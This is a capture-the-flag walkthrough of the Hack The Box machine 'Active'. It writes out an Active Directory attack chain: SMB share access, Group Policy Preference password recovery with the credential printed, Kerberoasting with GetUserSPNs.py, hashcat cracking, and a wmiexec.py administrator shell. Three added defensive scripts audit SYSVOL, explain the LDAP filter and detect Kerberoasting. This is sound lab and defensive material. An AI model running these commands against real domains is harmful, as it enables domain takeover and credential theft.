Hack The Box: Active

Difficulty: Medium

Machine Creator: eks & mrb3n

Tools Used:

NMAP

SMBCLIENT

gpp-decrypt

smbmap

ldapsearch

GetUserSPNs.py

Hashcat

wmiexec.py

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.100

The nmap scan shows us some interesting results. We can see port 53 (Microsoft DNS), port 88 (Kerberos), and ports 389 and 3268 (LDAP). From this combination of ports we can expect this server to be a domain controller for the domain active.htb.


SMB

SMB port 445 is also open on this box, so let's see if we can access any open shares.

smbclient -L //10.10.10.100

smbclient //10.10.10.100/Replication

Group Policy

CPASSWORD

https://msdn.microsoft.com/en-us/library/cc422924.aspx
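The Replication share above is a copy of SYSVOL, and the cpassword attribute it exposes in a Group Policy Preference XML file is what gpp-decrypt works on. From the defender's side the useful tool is a scanner that finds every GPP file still carrying that attribute so the preference can be removed and the password rotated. The script below is an added example for this write-up, not code from the original post or from gpp-decrypt; it builds a SYSVOL-style tree in a temporary directory from constructed XML (the cpassword value and GPO folder names are placeholders) and reports the entries without decrypting anything.

```python
"""Audit a SYSVOL-style directory tree for Group Policy Preference XML files
that still carry a cpassword attribute.

Added example for this write-up, not code from the original post or from any
tool it names. It does not decrypt anything: it only locates the entries an
administrator has to remove. The SYSVOL tree is constructed in a temporary
directory so the script runs offline.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP file names that can carry a cpassword attribute on a <Properties> element.
GPP_FILES = {
    "groups.xml", "services.xml", "scheduledtasks.xml",
    "datasources.xml", "printers.xml", "drives.xml",
}

# Constructed sample: one policy that still stores an account password
# (the cpassword value is a placeholder, not a real blob) and one clean policy.
GROUPS_WITH_CPASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
        uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_ENCRYPTED_PASSWORD" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

DRIVES_CLEAN = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:" status="H:" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" thisDrive="SHOW" allDrives="SHOW" userName=""
                path="\\\\dc\\home$\\%LogonUser%" label="Home" persistent="1"
                useLetter="1" letter="H"/>
  </Drive>
</Drives>
"""


def build_sample_sysvol() -> str:
    """Write the constructed policies into a temp dir laid out like SYSVOL."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    files = {
        os.path.join(root, "active.htb", "Policies", "{GPO-ONE}", "Machine",
                     "Preferences", "Groups", "Groups.xml"): GROUPS_WITH_CPASSWORD,
        os.path.join(root, "active.htb", "Policies", "{GPO-TWO}", "User",
                     "Preferences", "Drives", "Drives.xml"): DRIVES_CLEAN,
    }
    for path, body in files.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def find_cpassword_entries(root: str) -> list:
    """Return one record per XML element that still carries a cpassword attribute."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError as exc:          # report unparseable policy files too
                findings.append({"file": path, "user": None, "error": str(exc)})
                continue
            for elem in tree.iter():
                if "cpassword" not in elem.attrib:
                    continue
                # Different GPP item types name the account differently.
                account = (elem.attrib.get("userName")
                           or elem.attrib.get("accountName")
                           or elem.attrib.get("runAs"))
                findings.append({"file": path, "user": account, "error": None})
    return findings


if __name__ == "__main__":
    for hit in find_cpassword_entries(build_sample_sysvol()):
        print(f"{hit['file']}: cpassword set for {hit['user']!r} "
              "-> delete the preference item and rotate this account's password")
```

Pointing the scanner at a real SYSVOL (for example a mounted copy of \\dc\SYSVOL\active.htb\Policies) gives the remediation list directly; MS14-025 removed the ability to create new cpassword entries but leaves existing ones in place, which is why the scan is still worth running.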


SMBMAP

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100


LDAPSEARCH

ldapsearch -x -h 10.10.10.100 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(servicePrincipalName=*/*))" servicePrincipalName | grep -B 1 servicePrincipalName
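The filter in that ldapsearch command is worth reading closely: 1.2.840.113556.1.4.803 is Active Directory's bitwise-AND matching rule, so the negated clause drops accounts whose ACCOUNTDISABLE bit (0x2) is set in userAccountControl, and servicePrincipalName=*/* keeps only objects with at least one SPN. The script below is an added example for this write-up, not code from the original post or from ldapsearch: it parses a constructed LDIF dump in the shape ldapsearch prints (all account names, SPNs and userAccountControl values are made up) and applies the same filter in Python, so an administrator can see exactly which kinds of accounts the query returns and which it silently excludes.

```python
"""Evaluate the ldapsearch filter above against a constructed LDIF dump.

Added example for this write-up, not code from the original post or from
ldapsearch. The LDIF is constructed to show which accounts the filter keeps:
only enabled user objects with an SPN. krbtgt has an SPN but is disabled,
DC$ is a computer object, jdoe has no SPN, and svc_old is disabled.
"""
from fnmatch import fnmatchcase

ACCOUNTDISABLE = 0x2   # the bit tested by userAccountControl:1.2.840.113556.1.4.803:=2

SAMPLE_LDIF = """\
dn: CN=SVC_TGS,CN=Users,DC=active,DC=htb
objectClass: person
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
sAMAccountName: SVC_TGS
userAccountControl: 66048
servicePrincipalName: active/CIFS:445

dn: CN=krbtgt,CN=Users,DC=active,DC=htb
objectClass: person
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
sAMAccountName: krbtgt
userAccountControl: 514
servicePrincipalName: kadmin/changepw

dn: CN=DC,OU=Domain Controllers,DC=active,DC=htb
objectClass: person
objectClass: user
objectClass: computer
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=active,DC=htb
sAMAccountName: DC$
userAccountControl: 532480
servicePrincipalName: HOST/dc.active.htb
servicePrincipalName: ldap/dc.active.htb/active.htb

dn: CN=Jane Doe,CN=Users,DC=active,DC=htb
objectClass: person
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
sAMAccountName: jdoe
userAccountControl: 512

dn: CN=Old Svc,CN=Users,DC=active,DC=htb
objectClass: person
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
sAMAccountName: svc_old
userAccountControl: 66050
servicePrincipalName: MSSQLSvc/old.active.htb:1433
"""


def parse_ldif(text: str) -> list:
    """Parse ldapsearch-style LDIF into a list of {attribute: [values]} dicts."""
    entries, current, last_attr = [], {}, None
    for raw in text.splitlines():
        if raw.startswith(" ") and last_attr:      # folded continuation line
            current[last_attr][-1] += raw[1:]
            continue
        if not raw.strip():                        # blank line ends an entry
            if current:
                entries.append(current)
            current, last_attr = {}, None
            continue
        if raw.startswith("#"):
            continue
        attr, _, value = raw.partition(":")
        current.setdefault(attr, []).append(value.strip())
        last_attr = attr
    if current:
        entries.append(current)
    return entries


def matches_filter(entry: dict) -> bool:
    """Python rendering of the LDAP filter used in the ldapsearch command."""
    if not any(v.lower().startswith("cn=person,") for v in entry.get("objectCategory", [])):
        return False                               # (objectCategory=person)
    if "user" not in entry.get("objectClass", []):
        return False                               # (objectClass=user)
    uac = int(entry.get("userAccountControl", ["0"])[0])
    if uac & ACCOUNTDISABLE:                       # (!(userAccountControl:...:=2))
        return False
    # (servicePrincipalName=*/*): at least one SPN containing a slash
    return any(fnmatchcase(spn, "*/*") for spn in entry.get("servicePrincipalName", []))


def kerberoastable(entries: list) -> list:
    """sAMAccountNames the filter returns: enabled user objects that hold an SPN."""
    return [e["sAMAccountName"][0] for e in entries if matches_filter(e)]


if __name__ == "__main__":
    for name in kerberoastable(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: user account with SPN -> needs a long random password or gMSA")
```

Running the same filter against a real export is a quick self-audit: every account it returns is one whose service ticket can be requested by any domain user, so those accounts should have long, random passwords (or be group managed service accounts) and should not hold domain admin rights, which is the combination that makes this box fall.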


GetUserSPNs.py

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py

https://github.com/SecureAuthCorp/impacket/tree/master/impacket

python GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request


Hashcat

hashcat64.exe -a 0 -m 13100 active_hash.txt rockyou.txt
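The GetUserSPNs.py request above and the hashcat run that follows it (mode 13100 is Kerberos 5 TGS-REP with the RC4 etype) leave a footprint on the domain controller: a Security Event ID 4769 recording a service ticket issued for a user-account SPN with encryption type 0x17. The script below is an added example for this write-up, not code from the original post or from Impacket; it applies that detection to constructed 4769 events (the field names TargetUserName, ServiceName, TicketEncryptionType, IpAddress and Status are the real 4769 fields, the values are made up) and also flags a requester that pulls tickets for many distinct user-account services.

```python
"""Flag Kerberos service-ticket requests that look like the GetUserSPNs.py
step above, using the fields of Windows Security Event ID 4769.

Added example for this write-up, not code from the original post or from
Impacket. Events are constructed dicts; in production they would be read
from the Security log or a SIEM.
"""
from collections import defaultdict

RC4_HMAC = "0x17"      # ticket encryption type a roasting tool asks for
KRB_SUCCESS = "0x0"    # Status of a ticket that was actually issued

# Constructed sample: normal AES (0x12) host-service traffic, the DC's own
# krbtgt request, and one RC4 ticket for the Administrator account's SPN
# requested by SVC_TGS from an attacker workstation, plus a failed repeat.
SAMPLE_4769 = [
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.100", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x1b"},
]


def is_user_service(service_name: str) -> bool:
    """True for service principals that are user accounts, not machines or the KDC."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_roasting(events: list, many_services: int = 3) -> list:
    """Return alerts for RC4 tickets issued for user-account SPNs and for
    requesters that collect tickets for many distinct user-account services."""
    alerts = []
    per_requester = defaultdict(set)
    for ev in events:
        # Only successful tickets for user-account services are interesting.
        if ev["Status"] != KRB_SUCCESS or not is_user_service(ev["ServiceName"]):
            continue
        per_requester[(ev["IpAddress"], ev["TargetUserName"])].add(ev["ServiceName"])
        if ev["TicketEncryptionType"] == RC4_HMAC:
            alerts.append({"rule": "rc4-ticket-for-user-spn",
                           "requester": ev["TargetUserName"],
                           "source": ev["IpAddress"],
                           "service": ev["ServiceName"]})
    for (ip, user), services in per_requester.items():
        if len(services) >= many_services:
            alerts.append({"rule": "many-user-spn-tickets", "requester": user,
                           "source": ip, "service": sorted(services)})
    return alerts


if __name__ == "__main__":
    for alert in detect_roasting(SAMPLE_4769):
        print(f"[{alert['rule']}] {alert['requester']} from {alert['source']} "
              f"-> {alert['service']}")
```

The RC4 rule is the high-signal one on a domain where service accounts are configured for AES (msDS-SupportedEncryptionTypes), because then a 0x17 ticket for a user-account SPN has no legitimate source; the distinct-services rule catches tools that request every SPN at once even when RC4 is still allowed. The cracking step itself is invisible to the domain, so the mitigation is on the password: the hashcat run above only succeeds because the Administrator account's password is in rockyou.txt.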

wmiexec.py

python wmiexec.py active.htb/administrator:<cracked_password>@10.10.10.100

User.txt/Root.txt